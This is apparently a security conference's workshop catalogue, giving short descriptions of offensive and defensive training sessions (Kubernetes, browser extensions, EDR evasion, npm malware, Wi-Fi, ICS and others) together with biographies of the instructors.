Braelynn is a security consultant at Leviathan Security Group where she conducts security assessments of products for startups, Fortune 500 companies, and everything in between. She enjoys partaking in CTFs and researching the security anything that piques her curiosity. She has previously presented this research at conferences such as Chaos Communication Congress, HITCON and DEFCON.

Kubernetes has transformed how we deploy applications, but its complexity has created a new attack surface actively exploited by threats. This workshop delivers practical experience exploiting and defending against dangerous misconfigurations found in production environments.

Based on extensive research and the popular Kubernetes Goat platform, you’ll work through realistic attack scenarios including privilege escalation, container escapes, lateral movement, and persistence techniques. For each vulnerability exploited, you’ll implement corresponding defenses using Kubernetes-native controls.

Our pre-configured environment with vulnerable applications lets you focus on mastering both offensive and defensive techniques. You’ll gain:

• Hands-on experience exploiting critical misconfigurations
• Methodology for identifying vulnerabilities in your clusters
• Skills implementing defenses across the Kubernetes lifecycle
• Ready-to-use templates for securing production environments

Whether securing Kubernetes or adding cloud-native exploitation to your skillset, this workshop delivers actionable knowledge through guided practice rather than abstract concepts.

Madhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.

Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.

His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.

What threats are hidden in network traffic? In this hands-on course, we’ll show you how to spot malicious activity hiding in plain sight. Learn how to filter noise, detect C2 traffic, and uncover stealthy attacks using real-world packet captures. Whether you’re into blue teaming, incident response, or just love dissecting packets, this session will sharpen your network forensics skills!

Chris is a Packet Analyst at Packet Pioneer, specializing in network performance analysis and forensics using Wireshark. Whether he’s investigating complex issues at the packet level or leading hands-on training sessions, Chris is passionate about helping others master the art of packet analysis.

As a certified instructor and active contributor to the Wireshark Foundation, he regularly teaches interactive Wireshark courses for audiences of all sizes. Chris also shares bite-sized tips, analysis techniques, and troubleshooting strategies on his YouTube channel—making network forensics more accessible to analysts at every level.

Browser extensions have quietly become one of the most underappreciated attack surfaces. While marketed as productivity enhancers, many of these extensions operate with elevated privileges that rival native malware in terms of access to sensitive user and organizational data.

This hands-on workshop takes a deep dive into how browser extensions operate under the hood and exposes how easily legitimate APIs can be weaponized to exfiltrate credentials, hijack sessions, monitor user behavior, and leak sensitive corporate information. By reverse-engineering real-world extension behavior and building functioning proof-of-concept (PoC) malicious extensions, participants will gain a direct understanding of the risks these extensions pose.

Through practical exercises, participants will: – Learn the browser extension architecture and permission model – Examine key APIs commonly misused for surveillance or data theft – Build PoC malicious extensions that exfiltrate session cookies, read passwords, record keystrokes, capture DOM content, and more – Analyze techniques for stealth, obfuscation, and evasion – Explore detection blind spots in endpoint and SSE security tools – Review mitigation strategies and enterprise hardening recommendations

Or Eshed is CEO and co-founder at LayerX Security. Prior to founding LayerX, Or worked for 12 years as a cybersecurity and OPSEC expert at ABN AMRO Bank, Otorio, and Check Point, where he led the takedown of the world’s largest browser hijacking operation with over 50M browsers compromised, and his work led to the arrest of more than 15 threat actors. Or also has an MSc in Applied Economics from the Hebrew University of Jerusalem.

Aviad Gispan is a Senior Researcher at LayerX Security, with over a decade of experience in browser security, JavaScript, and frontend architecture. He develops sandbox technologies to detect malicious extensions and researches advanced techniques to strengthen browser-based protection. Previously, Aviad led innovation in Proofpoint’s Web Isolation group, focusing on performance optimization and resource efficiency.

Using cryptography is often a subtle practice and mistakes can result in significant vulnerabilities. This workshop will cover many of these vulnerabilities which have shown up in the real world, including CVE-2020-0601. This will be a hands-on workshop where you will implement the attacks after each one is explained. I will provide a VM with a tool written in Python to execute the attacks. A good way to determine if this workshop is for you is to look at the challenges at cryptopals.com and see if those look interesting, but you could use in person help understanding the attacks. While not a strict subset of those challenges, there is significant overlap. The exercises will range from decrypting ciphertext to recovering private keys from public key attacks allowing us to create TLS cert private key and ssh private key files.

Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh’s crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy VillageHe now serves on the programming committee of the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.

Kubernetes is now at the heart of modern infrastructure, yet offensive security content targeting real-world K8s exploitation is still underrepresented—even at DEF CON. K8sploitation: Hacking Kubernetes the Fun Way fills that gap by diving deep into hands‑on Kubernetes hacking techniques including privilege escalation, lateral movement, and control plane compromise. In this workshop, we set aside the buzzwords and focus on practical attacks and defenses drawn from real adversary tradecraft. Whether you’re a red teamer looking to understand how attackers think or a defender seeking to shore up your cluster’s security, you’ll gain invaluable insights through live demos, guided labs, and lessons learned from enterprise and government security operations. This session bridges cloud‑native technology with hands‑on offensive security training in a way that’s rare, relevant, and overdue.

Marcelo Ribeiro leads the Offensive Security Special Ops team at Hewlett Packard Enterprise (HPE) with 20+ years of cybersecurity experience across HPE, Microsoft, IBM, and the Brazilian Navy. A former Navy Officer, he helped build Brazil’s Naval Cybersecurity capabilities and led IBM’s DFIR practice in Latin America.

At HPE, Marcelo develops advanced offensive security programs, leveraging Kubernetes infrastructure and AI to enhance offensive operations and harden cyber defenses. He has presented at DEF CON 2024 and various security conferences, sharing expertise on red teaming, cloud security, and Kubernetes exploitation.

Recognized in the EC-Council CEH Hall of Fame (2023), Marcelo holds CISSP, CISM, OSCP, GXPN, GPEN, GWAPT, GAWN, GRID, GREM, GCIH, GCIA, and more. Passionate about pushing offensive security boundaries, he thrives on tackling new adversarial challenges in modern cloud environments.

Jeff Jordan is a Lead Penetration Tester in the Product Security Office with over 13 years of experience at HPE. He began his career in UEFI validation before transitioning into offensive security, where he now leads technical penetration testing efforts across a wide product portfolio. His work focuses on identifying and mitigating security risks through ethical hacking and secure development practices. Jeff has hands-on experience testing Kubernetes-based platforms, including containerized Home Subscriber Server (HSS) products used in 4G infrastructure. He holds CEH and CCSP certifications and plays a key role in driving product security strategy and execution.

BLE CTF is a series of Bluetooth Low Energy challenges in a capture-the-flag format. It was created to teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user.

Over the past few years, BLE CTF has expanded to support multiple platforms and skill levels. Various books, workshops, training, and conferences have utilized it as an educational platform and CTF. As an open source, low-cost of entry, and expandable education solution, BLE CTF has helped progress Bluetooth security research.

This workshop will teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user. For this workshop, we will undergo a series of exercises to teach beginner students new concepts and allow more seasoned users to try new tools and techniques. After completing this workshop, you should have a good solid understanding of how to interact with and hack on BLE devices in the wild.

Ryan Holeman resides in Austin, Texas, where he works as the CISO for Stability AI. He is currently pursuing a Ph.D. in cyber defense from Dakota State University. He has spoken at respected venues such as Black Hat, DEF CON, Lockdown, BSides, Ruxcon, Notacon, and Shmoocon. You can keep up with his current activity, open source contributions, and general news on his blog. His spare time is mostly spent digging into various network protocols, random hacking, creating art, and shredding local skateparks.

Alek Amrani is bad at expense reports.

This hands-on course provides an in-depth exploration of Medical Device Penetration Testing, equipping security professionals with the skills to identify and exploit vulnerabilities in medical technologies. Participants will engage in practical exercises covering device board analysis and attacks, external network threats, bypassing kiosk controls, Windows and Linux post-exploitation techniques, and execution restriction bypasses. By leveraging real-world scenarios, this course ensures a comprehensive understanding of modern security risks and defense strategies in medical environments.

Michael Aguilar (v3ga) is a Principal Consultant for Sophos Red Team. He leads efforts in Medical Device testing, Adversarial Simulations, Physical Security assessments, Network testing and more. Currently, he has 8 CVE vulnerabilities aligned with security issues located during testing at DEF CON’s Biohacking Village Device Lab. He has also led the winning team of the DEF CON Biohacking Village CTF for two consecutive years.

A seasoned medical device red team hacker with nearly a decade in the trenches, Alex Delifer (cheet) breaks stuff so others can sleep at night. He operates out of an unnamed medtech company, where he regularly tears through embedded systems, surgical robots, industrial controllers, APIs, and BIOS firmware like it’s target practice. A Biohacking Village Capture the Flag Champion at DEF CON, he’s known in some circles as the medical device testing sledgehammer—swinging hard, finding the flaws others miss, and leaving no UART unturned.

As defenders evolve with more sophisticated detection strategies, red teamers must innovate to remain effective. This intermediate hands-on workshop delves into modern obfuscation techniques, bypass strategies, and OPSEC considerations that reflect the current threat landscape. Participants will explore how Microsoft’s Antimalware Scan Interface (AMSI), Defender, and Event Tracing for Windows (ETW) are being leveraged by defenders and how to navigate around them.

You’ll walk away with an understanding of the real-world effectiveness of techniques like string encryption, runtime compilation, sandbox evasion, and how minimalistic evasion (“least obfuscation”) helps evade both machine learning and heuristic-based detections. Attendees will use PowerShell, C#, and open-source tooling to build and test evasive payloads in a lab setting.

In this workshop, attendees will: 1. Learn to identify and break static and dynamic detection signatures. 2. Employ least-obfuscation strategies and runtime evasion. 3. Build AMSI and ETW bypasses using up-to-date PowerShell and C# techniques. 4. Understand P/invoke and API hooking 5. Evaluate how defenders log and detect activity and design code to stay under the radar.

Jake “Hubble” Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.

Vincent “Vinnybod” Rose is the Lead Developer for Empire and Starkiller. He is a software engineer with a decade of expertise in building highly scalable cloud services, improving developer operations, and automation. Recently, his focus has been on the reliability and stability of the Empire C2 server. Vinnybod has presented at Black Hat and has taught courses at DEF CON on Red Teaming and Offensive PowerShell. He currently maintains a cybersecurity blog focused on offensive security at https://www.bc-security.org/blog/.

Gannon “Dorf” Gebauer is a Security Consultant and Tool Developer at BC Security, specializing in threat intelligence, embedded system testing, and automation for range deployments. He has led teams through CyberPatriot, the USAF CTF that challenges participants in both defensive and offensive capabilities. Gannon is also an accomplished speaker and trainer, having delivered talks and training sessions at Black Hat, DEF CON, and Texas Cyber Summit.

Rey “Privesc” Bango is a Principal Cloud Advocate at Microsoft and a Security Consultant specializing in red teaming at BC Security. At Microsoft, he focuses on empowering organizations to leverage transformative technologies such as Artificial Intelligence and Machine Learning, prioritizing trust, security, and responsible use. He is an experienced trainer and speaker, presenting and teaching at cybersecurity conferences, including Black Hat and DEF CON. His work continues to bridge the gap between cutting-edge technological advancements and the critical need for secure, ethical implementation in today’s world.

Software supply chain attacks are out of control! Between 2019 and 2023 software supply chain attacks increased by more than 740% year on year. Things have only gotten worse since then, with attacks like Bybit, Ultralytics, LottieFiles, Polyfills, and of course XZ utils happening in the last 18 months. But how are these supply chain attacks delivered? Often, the attack starts with a malicious npm package.

According to Sonatype, 98.5% of malicious software packages exist in the npm registry. There are several reasons that npm is particularly well suited for delivering malware, and that’s why I chose to focus just on npm for this 4 hour workshop.

This hands-on workshop will teach both software engineers, and infosec practitioners how npm malware works. We’ll learn what makes npm malware unique from other software package malware, and how the author has been using his knowledge of npm malware in his research, and to deliver unique offensive security engagements. Most importantly how to identify, analyze, create and defend against malicious NPM packages in this workshop.

The trainer for this workshop, Paul McCarty, is literally writing the book on the subject “Hacking npm”, so he will drop lots of in-depth, never before seen npm techniques.

Paul is the Head of Research at Safety (safetycli.com) and a DevSecOps OG. He loves software supply chain research and delivering supply chain offensive security training and engagements. He’s spent the last two years deep-diving into npm and has made several discoveries about the ecosystem. Paul founded multiple startups starting in the ’90s, with UtahConnect, SecureStack in 2017, and SourceCodeRED in 2023. Paul has worked for NASA, Boeing, Blue Cross/Blue Shield, John Deere, the US military, the Australian government and several startups over the last 30 years.  Paul is a frequent open-source contributor and author of several DevSecOps, software supply chain and threat modelling projects. He’s currently writing a book entitled “Hacking NPM”, and when he’s not doing that, he’s snowboarding with his wife and 3 amazing kids.

This workshop will teach how to start pen testing a cloud REST API. Attendees should have a fundamental knowledge of OWASP Top 10 and web application security. Attendees will learn how to setup tools (i.e. Burp) and practice on a simulated cloud environment to discover vulnerabilities in cloud REST APIs. This includes attacks in authorization, XSS, and SQL injection. Technologies such as OpenStack, Salesforce, and Google Cloud will be covered.

Rodney is a principal consultant and has specialized in cloud security for over 10 years. He has spoken at multiple conferences on topics from cloud security engineering to IoT device hacking. He has multiple CVEs for discovered web application security vulnerabilities. He started his career in enterprise web application software development but shifted to the security industry with this master’s thesis research project “A Framework for Benevolent Computer Worms” 2012. Website: https://www.rodneybeede.com

Ever wanted to tinker with a real industrial controller without risking a plant meltdown? In this workshop, you’ll get to play in a PLC playground using actual industrial control hardware like the MicroLogix 1100 PLC that simulates physical processes like a fluid tank and a garage door. Guided by ladder logic programming and Proportional Integral Derivative (PID) tuning exercises, you will program the PLC to maintain tank levels and move machines, observing how the control system responds in real-time.

This workshop focuses on directly interacting with and exploiting the physical PLC hardware and its underlying protocols with a hardware-in-the-loop setup that includes an HMI. Participants won’t just click buttons. They’ll write ladder logic, interact with real I/O, and observe how PLCs process and respond to industrial inputs in real-time. Along the way, we’ll highlight common ICS quirks and vulnerabilities (from insecure protocols to “insecure by design” logic) that can make these systems a hacker’s playground. The Hardware In the Loop Industrial Control System (HILICS) kits used in this workshop are an open-source project that was designed and built by the Air Force Institute of Technology (AFIT) to provide a safe, scalable platform for exploring the cyber-physical dynamics of ICS environments.

Dr. Anthony “Coin” Rose is the Director of Security Research and Chief Operating Officer at BC Security, as well as a professor at the Air Force Institute of Technology, where he serves as an officer in the United States Air Force. His doctorate in Electrical Engineering focused on building cyber defenses using machine learning and graph theory. Anthony specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. Anthony has presented at security conferences, including Black Hat, DEF CON, HackMiami, RSA, HackSpaceCon, Texas Cyber Summit, and HackRedCon. He also leads the development of offensive security tools, including Empire and Moriarty.

Dr. Daniel Koranek is an Assistant Professor of Computer Science at the Air Force Institute of Technology (AFIT) and a two-time graduate of AFIT in cyber operations (2010, M.S.) and computer science (2022, Ph.D.), where his research interests focus on the intersection of artificial intelligence/machine learning and cybersecurity. This includes using AI/ML to enhance cybersecurity and using vulnerability assessment and secure design techniques to improve AI deployments. He has spent most of his career on reverse engineering and vulnerability assessment of embedded systems like the HILICS kit, and overlapping AI and cybersecurity drove Dr. Koranek’s dissertation research on using the reverse engineering tool Binary Ninja to visualize explanations of malware classifications.

Tyler Bertles is a Captain in the United States Army, currently pursuing a Master’s degree in Cyber Operations at the Air Force Institute of Technology. He holds a Bachelor’s degree in Computer Science and has conducted prior research on automated flight systems, with a focus on quadcopter platforms. With over 10 years of experience in Army Aviation, he has worked extensively with satellite navigation and communication systems. His current thesis research centers on developing intrusion detection capabilities for satellite cybersecurity.

Captain César Ramirez is a student in the Cyber Operations Master’s Program at the Air Force Institute of Technology (AFIT). He has a strong interest in penetration testing and digital forensics, which is reflected in his current research on attribution through proxy chains and the use of Explainable Artificial Intelligence (XAI) to identify malware functionality within blue networks. He has supported defensive cyber operations for space systems and intelligence-sharing platforms. In addition, he brings unique expertise in the application of non-kinetic effects to degrade the performance and functionality of military-grade drones. Captain Ramirez holds multiple certifications, including Security+, Pentest+, and Certified Cloud Security Professional (CCSP).

Threat actors skillfully evade automated defenses. Countering them requires more than tools; it demands human insight and the art of precise detection. In Practical YARA: Crafting Custom Rules for Targeted Malware Defense, you’ll move beyond generic signatures and learn the craft of building truly effective YARA rules. This workshop focuses on translating nuanced understanding gained from malware analysis and threat intelligence into powerful, human-authored detections. Through fast-paced, hands-on labs covering static and behavioral analysis, you will master the art of identifying unique malicious characteristics and expressing them effeciently in YARA. Learn to build high-fidelity rules that supercharge threat hunting, pinpoint emerging threats, and give you confident control—skills essential in an era where quality hand-crafted detection logic provides a critical edge. Leave ready to bolster your defensive arsenal with expertise, not just automation.

Joshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.

Francisco is a skilled security professional with a strong background in detection engineering and threat intelligence. With extensive blue team experience, he currently works as a Security Engineer at Google’s VirusTotal Research team, where he leverages his operational expertise to investigate malware trends and create insightful technical content. Francisco’s background includes roles as a SecOps Engineer, and Professor of Computer Security.

Jae Young Kim is a Senior Reverse Engineer on Mandiant’s FLARE Team where he reverses malware and contributes to FLARE’s automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelors in Computer Science from Columbia University.

Join our hands-on workshop to master TLSNotary! Dive into multi-party-TLS (not man-in-the-middle) and learn to prove and verify online data authenticity to a third-party verifier while ensuring privacy. We’ll start with small examples and build up to custom plugins to prove and verify private user data.

Bring your laptop, bring a friend, and learn together. Get ready to unlock and compose web data in innovative ways.

AtHeartEngineer has been building and breaking things since the 90s, nearly setting his parents’ garage on fire while learning about mains voltage. He previously lead engineering at Privacy and Scaling Explorations, a non-profit focused on building privacy-preserving technologies using programmable cryptography tools like zero-knowledge proofs, and is now exploring what is next.

Sinu is a neutral systems maxi, a cryptography engineer, and the technical lead of TLSNotary.

Many cybercime and APT actors kill and/or silence EDR agents in order to evade detection, allowing them to achieve their actions on objectives without notifying security teams. How do they do it? What tools do they use? How do they write those tools? What is BYOVD? If you’re interested in learning how adversaries bypass EDR platforms, this workshop is for YOU!

Every student who attends this workshop will have a personal lab environment generated for them. Using the online lab environment, students will review a live EDR tool in order to become familiar with its capabilities, logging, and more. Students will then compile and run an EDR killer used commonly by major threat groups. Next, students will execute commands to silence agent-to-tenant communication, thereby negating notification to security teams.

Following the building, use, and analysis of readily-available tools, students will learn how to write their own code to achieve similar means. We will be using a combination of pre-provided code snippets and code we write in real-time in order to both kill and silence the provided EDR agent. Are you ready to take your reverse engineering and coding skills to the next levels? – Let’s do this! And remember: #RansomwareSucks!

Ryan Chapman is the author of SANS’ “FOR528: Ransomware and Cyber Extortion” course, teaches SANS’ “FOR610: Reverse Engineering Malware” course, works as a threat hunter @ $dayJob, and is an author for Pluralsight. Ryan has a passion for life-long learning, loves to teach people about ransomware-related attacks, and enjoys pulling apart malware. He has presented workshops at DefCon and other conferences in the past and knows how to create a step-by-step instruction set to maximize hands-on learning.

Aaron Rosenmund is an accomplished cybersecurity professional with extensive experience in various leadership roles across multiple organizations. Currently serving as the Managing Director of Tradecraft and Programs at OnDefend since September 2024, Aaron also holds a position at the National Guard Bureau as Staff Lead for the Cyber Shield Red Team, demonstrating a commitment to enhancing cybersecurity defenses. With a background that includes significant roles at Pluralsight, where responsibilities spanned content strategy and security skills development, and the Florida Air National Guard as a Lead Cyber Operator focused on defensive operations, Aaron has developed a comprehensive skill set in threat emulation, cyber system operations, and training. Additionally, past leadership positions as CEO at Aestus Industries and Vice President at Concrete Surface Innovations underscore strong management capabilities and operational expertise. Aaron holds multiple degrees in technology and cybersecurity from respected institutions, underscoring a solid educational foundation in this field.

The Nirvana Debug is a Windows internal features existing since Windows 7. This workshop idea is to see how this feature can be weaponized in order to either: – Hijack execution flow – Perform process injection – Perform sleep obfuscation for C2 beacon

During this workshop, you will learn the main principle of Nirvana Debugging, and try to weaponize it. Some debugging, reverse and coding will be needed in order to create a new malware that will evade classic EDR solutions.

WHILE THIS IS AN INTRODUCTION TO NIRVANA HOOKING, THIS WORKSHOP IS STILL A HIGHLY TECHNICAL WORKSHOP

Yoann Dequeker (@OtterHacker) is a red team operator at Wavestone entitle with OSCP and CRTO certification. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on Malware Developpement to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.

His research leads him to present his results on several conferences such as LeHack (Paris), Insomni’hack, BlackAlps (Swiss) or even through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). All along the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found on public products.

Join us for an engaging and interactive workshop where we delve into the hidden risks within your configurations in Snowflake. This intermediate-level session is designed to provide hands-on experience with vulnerable and misconfigured environments, utilizing plug-and-play Terraform scripts and your free-tier Snowflake and AWS accounts. Attendees will explore the UNC5337 data-theft and extortion campaign, and other common Snowflake misconfigurations and risks through a fun and interactive “Capture The Flag” (CTF) style attack scenario, with the main objective of leaking sensitive data from Snowflake.

Key Topics: -Snowflake as a data-lake service and common security pitfalls. -UNC5337 Data-Theft and Extortion Campaign: Gain insights into real-world cyber threats and how they operate. -Solve problems and bypass misconfigured security mechanisms. -Learn about data-related risks that could lead to a data breach. Technical Level: Intermediate Learning Outcomes: By the end of this workshop, attendees will: -Understand best practices for securing configurations in Snowflake. -Gain practical experience in identifying and mitigating unsecured configurations. -Gain knowledge to handle real-world cyber threats effectively.

Lior is a senior security researcher at Varonis and a passionate security enthusiast with a broad background in red team operations, penetration testing, incident response, and advanced security research. With experience at Palo Alto Networks and Team8, Lior has enhanced his expertise in cybersecurity research across multiple domains, including various cloud providers and SaaS platforms. Known for contributing to the LOLBAS project, he specializes in evaluating emerging threats and analyzing data signals, combining a hands-on approach with a deep understanding of attacker perspective.

Chen Levy Ben Aroy is a distinguished cybersecurity leader with a proven track record in cloud security, penetration testing, and red teaming. As a Cloud Security Research Team Lead at Varonis, Chen spearheads cutting-edge security research and innovation across multiple cloud-providers and platforms. His previous roles at well-known enterprises, such as Prosche Digital and ABInbev, showcased his expertise in advanced malware development and strategic project management. With a robust background in a wide array of cybersecurity domains, Chen’s visionary approach and technical acumen make him a sought-after expert in the industry.

WWED is designed for students to gain experience exploiting real world web applications and take their assessment skills to the next level. Students will learn advanced vulnerability discovery techniques to identify and exploit vulnerabilities in real world web applications. Getting hands-on experience using free and widely available Linux utilities to observe application behavior, to more effectively discover and exploit application vulnerabilities. Using a whitebox approach students will rapidly discover and exploit non-trivial bugs. Not requiring the use of expensive commercial tools or with the guess work which comes along with blackbox testing.

Students will be provided virtual machines of commercially available software applications which will be used for this heavily lab focused course. At the conclusion of the class each student will have developed a fully functional remote root PoC. This course targets a wide level of skill levels and will leverage a hints system to help students who may fall behind. Incrementally releasing solutions through each exercise.

Cale Smith is a nerd who loves both building but also breaking, so he can get better at building. He is passionate about understanding how anything and everything works, improving security along the way is just a bonus. Also, he is passionate about sharing his passion and created this course to pass along some of the more accessible techniques he has picked up. His professional career originated exclusively as a builder, but has been focusing on the security and breaking side for the last 15 years. During that time he has dabbled in the web weenie life, cloud, binary, IoT and mobile most recently. Currently he manages a device oriented AppSec team at Amazon. While AFK he is probably riding a bike or climbing rocks.

Security engineer by day, barbecue hacker by night—celebrating each fixed bug with a bit too much somaek. Off the clock, you’ll find him tinkering with hardware or firing lasers at something.

Husband, father, hacker, gamer. Young’s path into security started like a good game exploit—he wanted to win, bent the rules, and discovered a passion for hacking. He began as a web app security consultant, moved into penetration testing and red teaming, and now works in application security engineering, helping teams build secure systems (and still breaking things for fun). He also dives into all kinds of games and stories, especially fantasy with Eastern martial arts, and loves dissecting media with the same curiosity he brings to code.

Priyanka sustained her academic voyage using curiosity as her paddles before landing her first job as a software security engineer in an ancient company. For three years thereafter, she focused on research, development and security testing of OAuth2.0 and OpenID implementations. This experience led to her discovery of her passion in the identity space. In her current appsec engineer adventure at Amazon, she enjoys working on secure design assessments, bug bounty triage and fix validation, consults and security testing of web services. In her leisure, she enjoys hiking, lazy gymming, sketching, singing, watching anime and reading manga.

In Wi-Fi-So-Serious, we will explore setting up and troubleshooting a 802.11(Wi-Fi) assessment rig. Then, we will look at passive reconnaissance and cracking different Wi-Fi security protocols. Using the Kali Linux VM, we will set up our 802.11 cards in monitor mode and configure them to collect PCAPs. Participants will be taught the methodology and commands needed to troubleshoot wireless cards in Linux. We will work with command line tools like iw, iwconfig, hostapd, wpa_cli, and wpa_supplican along with others. Next, the course challenges participants to perform passive collections and work with Wireshark display filters. The course then covers cracking common 802.11 security protocols with Aircrack-ng, Wifite, Airgeddon, Reaver, and Wacker.The Wi-Fi-So-Serious workshops concludes with a Capture The Flag (CTF) so that participants can apply the course content with hands on keyboard. Participants will also learn how to set up a lab they can take home with them

James Hawk (He/Him) is a Principal Consultant with Google Public Sector within Proactive Services. He is the wireless subject matter expert for his team. James has led and contributed to numerous assessments (Red Teams and Pen Tests). He has developed internal training and tool updates for 802.11 for his company. James is a 20-year veteran of the U.S. Army and has over 10 years of hands-on experience in wireless technologies. James is constantly researching/testing 802.11 attacks against his home lab. He is a fan of hockey, LetterKenny, and almost anything sci-fi.

Brian Burnett is the founder of Offensive Technical Solutions (OTS) where he conducts web-application, internal network, and cloud penetration tests. Prior to founding OTS, he served five years in the United States Army, followed by seven years supporting internal teams at Fortune 500 companies. Brian holds degrees in computer science, pentesting, theology, and Russian. He enjoys tinkering with his homelab, collecting certifications, and committing poorly written code. His hobbies include Brazilian Jiu-Jitsu, purchasing unnecessary power tools, and CrossFit.